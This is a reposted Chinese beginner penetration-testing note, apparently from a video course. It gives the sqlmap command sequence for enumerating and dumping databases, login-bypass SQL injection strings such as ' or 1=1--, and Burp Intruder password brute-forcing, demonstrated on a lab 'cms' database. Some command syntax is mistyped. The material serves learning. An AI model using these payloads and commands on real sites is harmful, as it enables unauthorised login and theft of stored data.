ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

小白学渗透,超详细教程笔记~《绕过密码登录》原视频bilibili的2019超详细 渗透测试/黑客入门/漏洞学习视频教程!!!是个系列教程哦~

2022-04-09 13:31:06  阅读:189  来源: 互联网

标签:教程 name 密码 渗透 数据库 探测 -- 详细 cms


探测顺序:(注入六连)

  1、Sqlmap -uhttp://www.xx.com?id=x(查询是否存在注入点)

  2、--dbs(检测站点包含哪些数据库)

  3、--current -db(获取当前的数据库名)

  4、--tables -D”db_name”获取指定数据库中的表名(-D后 接指定的数据库名称)

  5、--columns -T”table_name” -D ”db_name”(获取数据库表中的字段)

  6、--dump-C”columns_name”-T ”table_name”-D “db_name”(获取字段的数据内容)

一、在用户栏输入:’用户名’or 1=1--。进入MySQL界面,可以看到password是多少

         

->从用户框输入:’用户名’or 1=1 --

  (1) 常用的万能密码:’or’=’ or’ 、’or 1=1-- 、’or 1=1/*;

  (2) 登录SQL的语句:select *from admin where username =’用户输入的用户名’ and password=’用户输入的密码’;

  (3) SQL语句:select *from admin where username =’’or 1=1—and password=’用户密码’;

二、渗透

  1、用BURP(爆破软件)探测,进行抓包;

              

  2、选择对应测试对象;

  3、在BURP设置代理(为了抓包);

      点AdvanLed->Network->Setting中第四个->关闭;

  4、到BURP菜单栏选options(第二行里)

              

  5、查看是否为登录IP地址的对应网站;

              

      如果原地址有误则出现MySQL报错

              

不报错是:……php?id 1=1

  6、选Intercept截断(登陆就能显示到抓包);

              

              

  7、转向网站输入密码:是正确密码直接就进去了,是错误密码就进行抓包、爆破。

              

  8、Intecept中的Raw是抓到的包的数据;

  9、把抓到的包进行发送处理:可直接点击Intercept中的Action就能发送到intruder模块了;

              

  10、选intruder->2->Sand to Intrillder

    点击Positions中的Attack type:选sniper对包数据内容进行包探测,对密码xxx进行探测。

                

    对密码xxx进行探测

        

    

  11、在探测完之后的页面,

     

     

     

  12、proxy(是代理)下有Intercept;

      

    (1) 源地址有误报错;

       

    (2) 源地址无误不报错;

       

    (3) 不显示内容也报错;

       

  13、演示登陆注入(对登录提交的参数进行抓取、注入)

  • 登录后将抓取的数据包copy一下。
  • 右键选Open Terminal进入root@kali:(下面的)
  • 代码意思:(进入’Desktop’目录)(新建一个’Untitled Decument1’类似文本文档的)
  • 将复制于内,Save到(桌面)target.txt ,关闭

     

    用sqlmap对刚抓取的内容进行探测,探测是否存在sql注入漏洞,(username –dbs是探测内容)

     

    探测出的cms注入的命令

     

    中间会问三次是否继续探测(选Y),第四次是是否要测其他,(选N)

     

    Information-scheme是其他数据库

     

  14、演示CMS注入并获取对应数据

  • (-dbs是对登录网址进行探测)在探测时可以按回车进行加速操作(在加速操作时电脑自动选择默认)

     

  • 探测cms中的数据库中数据表

     

  • (-D cms -T articles)探测cms中的数据库中的字段

     

  可看到是三个字段:

     

    (-D cms -T articles -C id,title,content --dump)探测当前字段中的具体值

       

  可看到三个字段的对应值:

     

    到此完成使用sqlmap来探测登录框及对应cms(ul)注入并且获得对应数据。

标签:教程,name,密码,渗透,数据库,探测,--,详细,cms
来源: https://www.cnblogs.com/051129-mgzhl/p/16121695.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有